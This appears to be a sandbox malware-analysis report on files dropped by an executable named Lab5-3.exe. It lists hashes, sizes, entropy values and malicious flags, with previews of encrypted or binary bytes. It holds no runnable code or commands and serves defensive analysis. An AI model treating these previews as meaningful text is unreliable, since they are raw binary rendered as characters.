                                                                                                          SSDEEP:1536:TKvkhKA9wEr39j4g4XBgdU6R5hn12t3G3FwX/SmbpoC6MafrjxlZ:TKV9I4XXIhn143yFwPzbL4frjTZ
                                                                                                          MD5:2EB73762A58F7BA4ADC78A575906E478
                                                                                                          SHA1:5A385C6B362292C1E96507E1BDD555E6C0AC3E93
                                                                                                          SHA-256:F1995B2BD9E9B75AAC241B1F5FEA20E99CE41526903041F742C698EC7F87C6F6
                                                                                                          SHA-512:5E4E1114F6370720569EDCF9F099B9E427562BEB3F4F4806F80AF25D038E62C1FB8599F3DBD81991895E4121941BAF163EF6C44A36AF264B55A8C1232D74B0B2
                                                                                                          Malicious:true
                                                                                                          Preview:.....F.>...X(oT....D..L...l.\ ..S...~ !9 .. .AA-..Q.......iv..C...nLw.(&-r.e..2.....[@+...C...pI...`.;V..{xN...".e..)...q..-n./D....f..H....x.....u.............L=.I...`..Z....3b.4..".a+...........t.b.q...v...ls...^A(.a.....`,...]a:}....kl,.}&A.#..[...`....#.z.g.i.a..`...i..*. C..y9b...:.\.TI..UJ#....<t7v..Y]..A*..y...*\....d..}....V%.rB(..}.O.$r.U....q8..(..5.@s.......cp.C.L~Si..X..8T..o..&O?....i..b..`...MU....W^.A%'.5.>z...k(....j-{r..7Sa."u.b...$.......)][a.x...[..g.D..5r.TM..q.%b>.?.6b.....4..Gu..U?"....O!....X7...R..).L,t..w.E1L]....P..v{.<'......&].....B.#O.#4.O.Q.._1$.K.S!b...:Bo.....$...^.,T.!.Sg......@~3~...f&....r...N/.....d......nf3.U..%`U..5@..`...K-r.V4mJ..,..4.6..h?...eF~j.:8.d.K.....^.......|..o...t.E;/..[.Hvie..}!..]g.il.).(,X_..(..7#a.........)I....R......&....p......ZAqF..q..q)/.&..-.?i..6*.....H...{D.%Pd.....[.r..c..k. .L..>A..Pl..G.'.f......}ji.Pl.frf`..."I.z..TQZ<9..4]..Y..6z..[.wr.'U......V5......q..X.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):451694
                                                                                                          Entropy (8bit):7.5252576733653385
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:QKAbJG4xzOF5r+jEjCDfkMhk4RhKL5Gce5osJl89v/4hG+H8Z:QhJflOF5SjE6cMC4RhKn6ogSFGA
                                                                                                          MD5:02C3F6FC6BFC96CEC65944FF8D95FCB7
                                                                                                          SHA1:1958204D92DAB6B4A286AD947B03CCEB660C1FC1
                                                                                                          SHA-256:23B5D0974FBE66C017C54CC8FAFA87C6D960FCC917A06C7E98251E1D01F8E6A7
                                                                                                          SHA-512:00D591684BFE584DE191F0748FB378D3BCF310E2119C1ADC5187B2B3569902D8676E4FEEC5FAB1478B27492E7F94570EC531BC1CCA9D6B9345DB427DAB7E6C78
                                                                                                          Malicious:false
                                                                                                          Preview:..=A..|..f.NCf.^J..../5..7..{sA.W.'+.5....I...O.A.y.,F.YX.L$.&..T&.59..(...I.L.......auO>.G...,...P~..g.]...-...ZK.|.b...1t.O...*...Q.Y.K]j.q.._g}wY8Q.Ex.........<3...N...31s.....3R.9..T..T....3w../...+\.t.wEZ.tA...ht..1..K.8..Z.Y.ra.. .Q......9N.,.]*...y}@..H.MX...I.Wc.\...i.uTW.!.....b.&i.q.9.`...C...O...E.LCU..u`C3...p.Jp..%.9gT...|U.!.Q. .....5.Zuc..;K....:...1.T.%...vnc1.-.bwF...Z...m..Ef...4.m.&z..Tp..%..Ds@.*.2.p.h.... ......6...Xo.kb|.4..I......&...B....:..0.}....Z.3.....As......Vq.GRt...,B.;..9.l.+;..@.P2.M..5.7X..%.3.M.B8.b.h.l.-P.0.)_3..*.g. T...NqS..Qj..?.......lQgO&.q..&.\|b......G...X..M....wnx..s..c....n.7.&....wR.../F...o.......}..C....mL......x..OI;...=R.... n..._.>3;.W....tE<..K...J=!.7.....0....1`H<........kdIin.....ty'6...Z.2....N..n....=.s'C..b...."J...'. FU.#.p!1.F..xJz.MWr..T:.U...,x...g..,.!.....,./.%.R{...Q.....3_"...... ..f+..C*EU.G.ulj...a.M.&t......I.2.>A.}...dz..M...6T=A.../...W..`.4>M..VEo]w[..b..|..#...~...u2u.x@}.S.!
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):246720
                                                                                                          Entropy (8bit):7.999302015500635
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:5UrdmlfRCBGbLifT3JPzgQIqMDx3m4UTEwmbRrDPoWiATM5jZ:qdSdbL+5zVnM5mWn3Fi84
                                                                                                          MD5:C50E220F4688A6D670C778BE7C26B845
                                                                                                          SHA1:AB601E362D821DC3602486A5837D7D06A476EDE1
                                                                                                          SHA-256:1A4D44D37DE26E7A1500302D14EE0E5EE3B572C1B51BF6BAAAA9464CFBADBF27
                                                                                                          SHA-512:162075C606E687C567AF518AA8BBEE29180F11F64709FAE3C90CD73B8C9030BB5C9AB91C14E5C2515C0C022143D844E248071A8B5EFFA2E3D8E37B83546E5FDE
                                                                                                          Malicious:true
                                                                                                          Preview:B?Q...h1.]7..Z-...hnV...Ik8..........V.;q,..C.3.......9.u|........L!`...$...f._..wNy.G...$a.._3..Y..x.!.....N+WO.e..!.7......Q...N.4.W8.sq}..al...AqsFL~.......:.[.....rs.N)......U......5.I\a..O..24{v[......q....pU....2OE..^.00..k..-.HP.6..W..(... H.i...a....Q.EW<_]...[o.?.>_..0 ..Q...r.0.J.s3Y&..Co..p...M..V=...B..j(..!.. _..Rn..~J....j.s{.....7..z..%6.(QZj@.._f.`...%6....h...{.....2..Oq...m*....5..~Ad.[Ew..9m.....2u.e....n...|hBG]..G.6.......'.C8q.i........F.3I..Y_........b....7..|b:w...gT.....)1.(1..3...)...`.A..'.@G-5..co.v.K........N.....O..0.B...i?%..h.[nf....#..S..-t..>#JV.#...H..?%...N-.3......=.p......*hE+......\.b$.u...d+..=8.'...?A......}&u....C.vP.v.....1.A..+. ."G../s...2..oZ.HFD2wB.....^..b....$}sU.'.fiz.......].....1..v..R/=y.g..K...p.}.U.^..Z. a..`....\..%W.?.........n..2(V....E.v...Y%5..S..{...p...b.6.D}.... N..*...8..@...gNn..P9..b..B.....#....!....l.......y.3)..'.{.:..Y...g.!t)..T~.'W.......59..Y..0.w+....R.ts.]...B
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23008
                                                                                                          Entropy (8bit):7.992947858422387
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:7P/IYCQx3KiQwXRM6Wk4WSS5+Idhkk4xFnEWrH5duX+HJOIC6HPzU1NHxt7mltb:7PwYC6KQxvGIdak4fnNgeOIHP437mlZ
                                                                                                          MD5:CB73C53DFDB76F435CD8FFA65EAFADA6
                                                                                                          SHA1:350517E39424256A679ED422BB754502AEFE1510
                                                                                                          SHA-256:6ED4E2202D8BD227E376153FAE3C7A5B9B10CD0DE9E026CE5F5F49C559C63469
                                                                                                          SHA-512:588687418122FD23DEFDE71032961CFE01A1C7EC5D20F6BBD864D11B9B27F64E7A72756A9F1D4BAAC89170D03647D18DFB1CE3DC200481CA52AD634C92E987C7
                                                                                                          Malicious:true
                                                                                                          Preview:0.....,..Fx....8.m........H.%u...`...h.tK...5.HK.....c.N{...{:.\......Z...I.....F0sC...O..].8....&....q.u.+P...S..#..b..;.D.h.(.y.%..0h...=...G....q..).........(.i.ks#(?.~h...,...<...Edp.>.V*.[.P...F...r.3 .%..."...Z&....g.z...pg...#..S.c?.G.Y..R....4...G.Mv.[...C...._S.P..P..........+.^".......N..M..23.......a_..C...k^.|..X....5Nk...s.&O....TC/.@.3}Sr.>.>6.....$..b|.]..=...F..Q.]...Hd.C..C.....&...w..a~..V.:hD.2`*p..'.~...u..M.$..)...6D((.l.nU.~..x.N.....p>.f.+.^|.....I....>.G..n#-5..6wu.4C(.E.G..h4.k....V..B....-.j.).jU..........&O+.c.I..<..N.ic!......{.......7.Z..Ob.i.*.....0n.]....W.X..........yWN.S/)J...e...?9|....(... .0E.)....Fc.....^.20...w.2..e-.8.^G.g..sD...\)o.[...lt...J..N......WzP..8....nX.pw6X...R.,.d.a..a^.U.~...j#&2Fs0$~R.-r.iP.....&.t.{.Z....u..L....8............Pq.E.<,....T..X:.......=...G[..}`.1.My..d.....*..f.~{T%5L+T.......o..:X.M....%=y....hqv...)..%..2.......].MG."[}...E%....3.R..J.E..{.{......}n.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):35008
                                                                                                          Entropy (8bit):7.994510106976102
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:gQCIcxQOYVE8SBVIJVxHBf617t2ylCyjgX16oEBf1yqbtFGesXZ:gH9mE8+SVxZ6152ylDgX1nmjYesXZ
                                                                                                          MD5:47DE7EC5F2DE60EF1EA0D6EC35E47FE7
                                                                                                          SHA1:CBE75DC4ED57F526D70B7F14BEEF08E4653E3E1D
                                                                                                          SHA-256:D18FA95274D5512A04133E71F2DD72C2A562B631052DD67584E81F25A4818EE8
                                                                                                          SHA-512:B822290D1FB7670457EA1D4D16575D55C99F86E6AD4C8E1D24DB5AE6F2CEFEFC5C750301428C853466106EED1863801F22B55ABA9CA0A4C862F3DA74675CBDFE
                                                                                                          Malicious:true
                                                                                                          Preview:..=yG..&Z..XF..BmU.s.S..8[.....t..5..&_Lq.e..6..-.8..d>.p......."..D...V..wi...WO2.F..d..*II.n<;.J.,.Xm.B.$..W......8....k'..:..Y........"..l......p.p..@L...x. _.......\.=pL.HX:.H.6UB...o......T...t.S...lI.-...[....e.'S+...7.!.*..NVP.ATO...".W.....Z,...Z........3..k.'..6q~.F.0..Z....Svmx.?..Z..4.....$,...q:.y..V.a..geN...?..#..P.S.'.........D..M..~._...!)A...Vb"..@F..0...O.gXg..1..<...N.).....j..r...........U p..Z@...oAfvGA.3.t.x.Q.g..C...v#..ml\....5....&.O...W..{.K'..h..Q._.).O..t:.*P2.(O.,.cJ..|..2\.}v_u.T...:.,77.....'.....:..N^xy.......r..V..%Lj..k....s......Hb.......Tm.m..=.5%..b..%.....B..i. ..cI....K=l0.E@..{GW1..H..m\<...v'g_g.|..9J...L$.(...+.0.x4gG.W.>E.Z.....R...Y......]h< e.O$.:...\0W.[...qC...C.?.../iR..tO..eiB.....0.'..d...]..hN=.2(...!T.S.U.].b.iF...G..|Z....q...}..Z...{%.AY2..A.>.9.l.:..L..dS...yw.L.O...sf.j,.....'G....A.............q.. ...p.......A......8.Z.a.9..:..........{..N...Z...j.....6.)O.....=...Q.g..U..>
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):286796
                                                                                                          Entropy (8bit):7.969449724652877
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:u3Jq85oJLxgNmsRekE4aB53oQR3jaXi031v4H2iV6NxbajsZ:uT5oJLiNmsRhan3o2z+X31AUxgQ
                                                                                                          MD5:8CDB3560DABA99A4DD79EC5C43B4F281
                                                                                                          SHA1:D9077EC3AA0C7CA1C72EBFC0707B7E8A903B0DE8
                                                                                                          SHA-256:521ED7544042F0AA449DAE86AE5BCE02A62071CEA22C57E1FF5B53F6CC8F52E5
                                                                                                          SHA-512:638C504EAB7E3085E24F7D3619B29EEF79EC013A0E8BFFBCAB4E7E7233F3789D5B4ADE81D1F782405E615141CA540EA46EB28E8E554F16B8E5C589D93C768679
                                                                                                          Malicious:false
                                                                                                          Preview:...R..,.m.j.Y.q...Y.....u...Qjb>..{....,......^..U..'u..g../.........D..$.'<"..SC...C.=...Q....]..T.i.#.4..M..6..^.#..Z.J.e.Jmq.QF.'j.O...&.c..16....~.bc.S.....F|..R...J..oLX.!........!..........>.00$...nY`..7u_SH..^.u..U`J/?..#Nl[..j.....u...j>.S.}[Q.......Jo..k...b...<G.;....N.NYLv.B?.:.E":.....dQ...JD.aJ...h...7=*.U...~L4%...E.t.......'....S........HE.6..=.#j.)..7.t.+..#..&w..Y.vKJ.KT.]E{U.F..?..Z...].k..,....y0p......N..I..0yu..C. ..v...2V...7....f......*.,Q\&o.\.....Z......OD"._.A[..o...8.9...|...`......}.b...rO....ynY]..W./.9.Z!....lG.Z..,.r.b,...H.....g....l!..w..n..3.0wr.....b..k].%.._..!'.:.d.8..'.kx.,]...^!......>u....1.0........e..R...I.9.k...Fm...HC.o`.$7.C/.p..........y.i..pb.Y.R....9W..7[...=.u2.j8.]*..Pv:....Y.im6.......R..w...g.*2..n.,.."..q.{./>....<....lFo...z.U....!.....p..a[..j>...Z....T........#.!..v...?..Q~..X<.U.~..n..... ..l.#=B...7E&....!e.. ]T....;..C...g...|..>.|.@.e.......b>t..;._..Sj.=#3p`8{.o.p.E.'..x..f
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23264
                                                                                                          Entropy (8bit):7.99228732625536
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:Y3xFoeQy7ud1RXgTR0qFGQltihCuCFNcwn0GqODGSL+qEmkYRn5HG3HKEdotb:YPud1RwLFifCj9n8OpaPdoZ
                                                                                                          MD5:E12BEDCFED9468FDEB75A2A5F710F5C7
                                                                                                          SHA1:3A7BC0353A888F5EEF6827BE0FB35FE654363B2D
                                                                                                          SHA-256:6FDF7FE4CE8D90F369D694623CD14CA14D7368EF8979A6EB2B069EDC095D2486
                                                                                                          SHA-512:D6A5DB90499E7951E0A32560FFB2089F4BE99CF1410577F6D53A9C7EE90DB98025580F0BF1DCF3C86263D074FFE302A7495EFC2C9DF0054C054ED8B94CE14504
                                                                                                          Malicious:true
                                                                                                          Preview:......hA...`20..y.[.. .....gA...Y.....$mSZ.q..LP.$..'...O.(g.....TQ.v.k.".O....".(..w..+.y1vs...j.q..=.F...sG.......0..;~I.,x:..Y.].A....8..f.u...v t....!.8[.w~z}..N1.......`.7v..wL'..[U.O<...f...@...\A....1.?s$.W..@@..<.F..Y.$.I.BpU.N.W..."....s..N..L9.(H.!.../.v..f.Q.3...F"..4.4...-.R'X..T..o..t...)..-...d..(..z.8".(_.9.Gp..p?.p...g......S.+.."...5){.K.+.=x..p.....>..<B..$".`"...Q1..u.............U.."....2.{.....&I.w.\.w.A.Gy5D8..4.<co...?2.tMq.l..&h+....Z..Q.......f.F..**(...Gc......N....Z2=..Z0~..i..2.....;R91.y..0.&i....3U.....c.}...~(.....r..a[*..$]...;.\...........W.].ib....ro}..].9\....x.2XS.8........m.U.o.zB./.h....d.Ts..>..].)...?...r.....7..BZF.6..^T&H>.'...../....K.^&.v.=.^M.y.x(..`\R&.....?..v;.S ..*V..w?:."R......j....G....[.e.,..h.BK...y;......@...br..t..F..R.........[.xn.d.n.]......(...%=...*.]...vE..).....b....~..[}.2b..5..n.R.D-........M..../d.....c...6--..{..X^.@...$.kaw.:......em.m.1Z$..2..KeW.u.%KK+N..I...T`....r.d.v.S.7
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):42320
                                                                                                          Entropy (8bit):7.995459839564371
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:QhgpqIVxV6X2VbUOzXjULM7gXbIjtJNwL8AQJG6ldhMQQgJ5zlbdpIPZ:Qhgs60OmbIjtrAQg+Ap0Lp4Z
                                                                                                          MD5:E870EA03598329C825FC199375217D2D
                                                                                                          SHA1:6A52C2D1F7EC02C2E8FEACCCCCA306E3BC529979
                                                                                                          SHA-256:E394280B0F059BA2DBBE96E8263387C19C3B7F015B36028CE848BEDD00AD8AC2
                                                                                                          SHA-512:E6C1E9DB1215EC2D9D627D19D84FEAE2056B6CE673D1B3816E3C4CA6A0F22BD9F61B9B4A345E51129944AC45FCB79C32BE65C343E05C4C6D8DEEA157E076CAA1
                                                                                                          Malicious:true
                                                                                                          Preview:.|L.:.S..Y.....-.....x)].Q...`.O...p.+....]h....nH!..T.$.4X...J.X..*8|.FEGk.m{.0_..{...i..U.....5.y.I.#f.........r...k.a..|.AA....f..).i.}.V.........f.|.....<`.....S.3.....Q-.....s~..._<..U.......B#B...}....VR...L..R.d.dHd..|......|.4}.u..8.Y.;.+......:;.8H7_/.!B...3.../_,p.*.(.G....c.k)>w>......._G%7..K.".....E.X......N{..k.....i.r. 6Hw*..p.......e....E../K.....J.9.. "!...E.....8..m..v..FF......\.P.........=.1..{h.M5.-,bX...}...%.~V.I.....+j_/......*". ..l........4f3.E........5$.f.z..]Y.\......&.1q.Ba>$..C1'.yM.._.=e.1...:..0...w..N.1,.O..9...E.p..d;....t..{.?.....Y.?.L.;.D.'qj..8x!...=..V..}..^.......\.{(.......e.q...s.WF.d-bK&...b...'|.z4..Ej.j.m.@.-...Op..@..>=.5..H.......x?..)."G.O.5...~.qmF.%...).......8...,...U$.....^.._`.rsX......{M.KP........ .^{.'Lx..,\....n...@.h..Q<.q.(..gm.....}...gi....8..V....@.J..s.X^OrDG.}..{^r_.Ur.z...........T...>nQ..B.@T.1..F..d...N.X...p.Z..H1a25.r.(.aP.].w....@..-...V..W....de..e...........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):770226
                                                                                                          Entropy (8bit):6.889409235574803
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:1YyGUYbZ8PtJvDREE8DNAst3wrUKpoyNG75RRRXELw8qbB:1YzbZ8FJlFQNAW3wQKOyNG75Rrmw8q9
                                                                                                          MD5:E7C4004A0EA6B637E5BE858228B55D2D
                                                                                                          SHA1:ADCFB6DF6FD32BAC4FF8B32ECDEC70B02ECCCC93
                                                                                                          SHA-256:0C239CF66DC3A9AFBBE74812E1405FBB558EC558710BC5EEF090283CC2E38866
                                                                                                          SHA-512:BB0D23CB7000F9A6451EB86C4622EB78AE51112AE4F6D948365570A2BAB8CAE95284C41B29F6186AA443EF195D5CB68943D058F3DAC3FE0D4C845795B0E0B316
                                                                                                          Malicious:false
                                                                                                          Preview:]Y.......v..........B...x...T.F..2.M..G.W.g....@.E.#F.M. .....MLE|DEN....%.M..%!..;.Y.V._.{.~{..<ovw..S.V.b....0.}C.\Rax....G.~.pa...D....1.'.%.T|&..g*.1c..iW.T6 ..r...ue..{.j..K.wG..].R.M..;:h/..a.j...T.B....s....0S..J.c...).....7>w.yS...@+.h.)l^U...e2DL.%...NS<.O..7%oW`....!..LA..,%.......w..W.T.S1.9.[...g`Q`|.9...;...:..=.}.".M.K#.......]G..?Tvp*t..[U..|<m2...]...G.o..s..U.....+...Yi.Q_.` .c...D....l.jx...z..FnO0.x+v...:{.MvZ..;.xCi.M........;.@Z..i..{.8.@Y(xJ..h...<..rM..m.`...[AN....}.).X\\...U..^-.rK...";X0.E..."....v]mn.m..a.=.F..xQ....|.%...4.....>F>.H....zq.?b.o.g\..d7kA3.L.O..ti.P([J..s,.f..(..'!..)...,b5..AVHy..K.p6o.....g..o..)p..1...g.r..^]..5.ixO../.......A..vt.i....s....#...cN.:`.Bw..y)...."..UX..p..BV.!.....>VO....1{A...G..X.#Kh..i.0.......s.....X .cQ..Zr....x...O.s..EH..<..&/-]k.J.L...........1Y.y..u.u.Q3(B..4yqS.......h.....x...x.f..%:...=)..n..Z..yL...K.N.2w.QPk.q..,fp......FxU...1=;J..F.......]f.=n2......5.'..~.(K..<
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):167232
                                                                                                          Entropy (8bit):7.999036233626342
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:5jZ/IDGXffaTqlTJWrBjmSCjeeJyikXqFLAkeofrOZ4L5hMxS0Z:lV+OffaTqlUrBQje0yikXqFLCaDk7Z
                                                                                                          MD5:D11EDF0BDA66917164D9101F305D5F59
                                                                                                          SHA1:0B8F08D94EBDDE08CE13CA08C4830BFE3A769A4A
                                                                                                          SHA-256:0FDF2A84E340B558DE0DA945115C6DDECBAC8B3F22A24BC046EA2A4F10FB6676
                                                                                                          SHA-512:FED1E93CD1A4061269C2A6D18B0B1697B6E1538D10172BBBE2D92A8D8A81E1920F0224FE7AA8D736F1D1900090FE4684FF3465591D43267B8D216BAA68CCCBA0
                                                                                                          Malicious:true
                                                                                                          Preview:.B.....]or..J..E.....%.AHz........:..hsc....'.3.z.Wl..{....."...h...`..I..w..KP.J.."f..$if...^h.o.... .zT....~.@-w....v..j6P.k...]4.;.2Ke..P...#m...:~.&.8s.......q..w.=..o......gA.k..syizF.....|..Y...8.+.h.. .UU..x4G.;.E...k.s ..8..;.X.i.......[d4.....9/..1.^O.',=...:l]...*P......R:._......I.{.3.#q.z.r.1r...@}..v0.d\....../F.,Q...6...M..n.m..b...H..<....0>....]..?l.xv...V......mJ ^...Q@..t.-.......i7pj..%TK<..i.G.g....,.VOl#S{.L...o.+Ux..h......~..0Y7..&.H:o5.RX_Zx4.Sf...N..k.G:l....[Gx-`..~.Z.sGq5.SY..W.R.._t.=mw.&.T.....-...y.q^._.h...t~8DI..~.1|H.........Fq.N.d.e......|47'g....O.C...Y.8.'....=..<.o..+....x.....'.?.]..b\.=.V..9........~n....5.I...x.D.8c..o...4.M.B.8M..ky....0...`..@.U.....P....k.ib.R.^..D'.W......Y.Y...W.G...|A.qwVq.-C.G...m.>."N.A....7..........*"m.<i.v.g%../*...X..._.^..+*c..F7...vP3.......%at=3..N.7d.....~..u|[FL.".H:.I...&u...N.c.D.m$9k.bC.H....|.##..../(.,.*es..R.4,..< .1{..V..6.g.6.y]..\....zP[.$.d...4...@E..O..%.z.g
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):113520
                                                                                                          Entropy (8bit):7.99856024283089
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:T/cJ1MbsJ7zlYs06xYsp2X+ozCtIxJ8zXuAr/kC0grE9qWnvEGm+7fQUs2pTAiz+:jtwxlYwx/6J6LPriqWS+7f5BTuq/2Z
                                                                                                          MD5:5AEBF035FC65CCAEE3CD08630EAB9E15
                                                                                                          SHA1:E789717851692D480021512F6C2FAF3D73169D6B
                                                                                                          SHA-256:0EED09ECDA4E8A23461492E2D71BB9AEDAE13AE5CDBBF0F40693716F54E33267
                                                                                                          SHA-512:987A7448C020C67F1931D8165A40054FE1502A4C1A07FC02D8FA9D397D7E519FECFFA80398B0B04D88B33F61740D7703EB10DC202577D78AEAF12F1093265940
                                                                                                          Malicious:true
                                                                                                          Preview:..|..#U.X.A.1t.R...w........CW}WbN.n..*34%.X..g...U.).9I...8..C.&.6./$.:8......B..@....ZR..F.j\%N........,.a...A..:i.T.t....NK..).L...m.}?3..Z...9...%:5^G..`..#.$.ZF....Bu..u...........+..pJ.....}=...hm.qV..Q$.t`U.........}...e.B....B.Q....9T.6A.P..[5M...=.O'+..EU...H...h...z...._3.'...&.s.2........."..e.R.@....L..Y).". .T...r8.V..D.<..........Z..Xa}....z.M..).(..1gE../>..p.T....=a&.....(J.:K...0..@7_....{....bQa......5>.t..T.!.[.......T.j..!..|..A.i......t..#.....4L.......T.U.....0.z.x8Xm"........IEs.&v"...I..!.+b....kz..j.f.;....(.W!.C8.uj..-.v..<I[...N9........t.,......:)...`.ei.....[..i[1.....T...<.cz..?F. N...H.xI.Vx...,.}V.O4n...y.d..s..^}-:.8Jb5.47...PL..8.Q.M.|k.$`.r......Y....d.[...b..U...I..xm..D`./.`...t..qi1.$...n..;.*b........E....x.1.L..1d.t.......3Cd........tt.'.....Wf..f.~I]U.IT...i7+.....c..b...'.._F..d.....k..8.....tC.x.W...v.vW..I1B..jB!....c...3...~..P9?f%.v..t.$..}vSq...\k1MP.hU.R".B.z..8.....wtL"[....v.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15696
                                                                                                          Entropy (8bit):7.989087535135396
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:NvbRXrd0ssuz/UXXvPWq0Fhd95zQDpcwSfAJza5MFtb:NvVhLrbUXchdLGcwSIwyZ
                                                                                                          MD5:F49F605218CCC6A148FE01017DF40033
                                                                                                          SHA1:DF30DC8B1CB05C03C868B71DC18316963949AD35
                                                                                                          SHA-256:F62C8AACFDD57C9E550A1AF32447C26EEA7AC01188E1362CFD23743D3CD108D0
                                                                                                          SHA-512:F1E58397F5370F56557B6A84017876146A77F279E12CDAF50C36FB0E0468225588F9FDDA33BF837C80B9B133B275741D357688B2AF2D4D7F9CAE373CF4395230
                                                                                                          Malicious:false
                                                                                                          Preview:....>.).J.-.p..:T......:=n..g...x....P..U....S.q.Y.H...........>...<..}....2P3,:....%...`y...o..?..h....u.j.}.F.WL..O..5.P.D...j..8C....p.......H.........L...N-.0W...lA.G#.m..hm.CW..9".u{CE...U..T....>.Uo.)..B....{zz..eG#...p|.`...g...!............2A.P.W.LF$.......y..h;..[5...O.+`%^).m..'d..M. o.L....%t..me..u.f.k..X....F...%`+N..D....m].....M3U....x..._`..'. ....._C/.i...!.....6a.v....(F*Or..$$.....v.<|.J.(=.,5.`%...eS.3.mt..v.Q...._p"...D../@<.4..L..y..i..>...>..z.z.W.1.g......3.e&......C.n...e.^dH.1..D....+..G....]..B.....!=^..7m..>..2..Z.A..._...{..=z.E. .....MO.4xx...].,.m.-o..IR1s{...}..F=..U...s..Rk:o...i1....|i.T.F6.`.D..R.....d*j.1C).].O....u.O<..).."..W..U...E..1..W..D.7...H.+.t.......t.0..XyF...V...,.Y........8a...y...&.oy.'.N(....Rz;.'v..{.8.:.dU.c..".?..1M.....-..Ym...e.....2....e$.J....3..$#k:.tP...jC..z.G6....w...*._....U..*.s....Y<Z..V...s.y.wv....u.:..k%.}'..9...}.?.....L.F.l`X*.Rt..].....k..w.......2....s./.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):106384
                                                                                                          Entropy (8bit):7.998184597403533
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:EPsNMuhuwMH4s9PKCgYBOLTMlAxpffKcCLDuPmk099aL40WoW9kqY5q78g1uVpL/:8uhnu5iYBITMa7WUv0veqXH1IpL1Z
                                                                                                          MD5:5748A142DE5193ECAA1FD802790C7B5C
                                                                                                          SHA1:B3DE94D352B1D64B3C4EC3B3D1675983C9F8FD8E
                                                                                                          SHA-256:8F67927D1A44AAD1B1D54EB9CC91295FDF478FA2F11D858B097A8018CCCCE651
                                                                                                          SHA-512:BA135D064E5DB4136ABB5004920769F41DB93CF8310ACC7BD9BA20423996C20CB60AD94CCD99526BA12DD64ADB3A61196081427796D38DBC093E5CE69CC2C771
                                                                                                          Malicious:true
                                                                                                          Preview:..+1%........7[...ul#H',K#...~/...........5..uL.Ccw.lD?J.H.....{...K._H2...$..W.:...Ns..).............'FC ........m.e4p@............O./...>.w.j9A..!..q.%q...+j.._t...^..._9....`...\u.E......+.s..S..8...S^P....P...?V?...%.S..(.4.......SW..vh...|.7|....>.DD...D....1B.1!..L..>.HU...K...3.%.K....B.g..(.%8vy....6....6e..%b.a..V...3.,...WC...W.M.'5..)]C..sZ.u....aBQ..........p.~..'t...B6..W...a.^ } A.....x.4.6f......~.he.+..J..m...0f.....l..>...y.F...*.........A..=......z%2..6.....a.h..A..d;.`.P...;.6.a."....2%n.t.).T.I....(...K..d..)<'.B.....#@.......d..AU.....?=......%I.....[.a.Le..+.....^....Kv.(.6.<./|?......u...6w..L...|i.RW.....J...a.v.....*..";......l.$J.p..2qA.*4...E.y4NU. .m{a....<.......UOZ.0.|lW.o6.8.|.`...,._.f+q......%|.....N..G.........D.B....p..JP.}.:!.T..{.}w.N._...B.Zj...dl.~..E....y..JL.hs.;.K.-..^..B.$....p.....:.A.S...p..I.g.......{[~...&..$i^.H..5.^;."....w...]........4..Q..F\..k&.)..\........K....F...;Vl.;.2I.H..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):54528
                                                                                                          Entropy (8bit):7.997261656099393
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:yoNTcz4oxN/eeXe0leIkt2tSf9X9qwQY0xuv7EU/3BfPWbR/kjb++0zsxZy71Z:FcsoxN/ee98IN0xohY0MR0cjbpEUZEZ
                                                                                                          MD5:A19C27BDD8A8C0D0DE71856C8BC3B424
                                                                                                          SHA1:232C40466C021AD0BAA13827BF6A7588D0A40BB0
                                                                                                          SHA-256:EAD5CD080E6B42DC64542D00F60B2922BEB9C92ABD5D0E1473E9F89503B452E3
                                                                                                          SHA-512:312B9F696D58C445A8A80AD7A8E8F862F730DE5887B5E9A8E9D651F3017B919C17EA2E8E1676AD1FAF884B62E3531C22F15F9D9E2AE6A02BDD10275E42332A7A
                                                                                                          Malicious:true
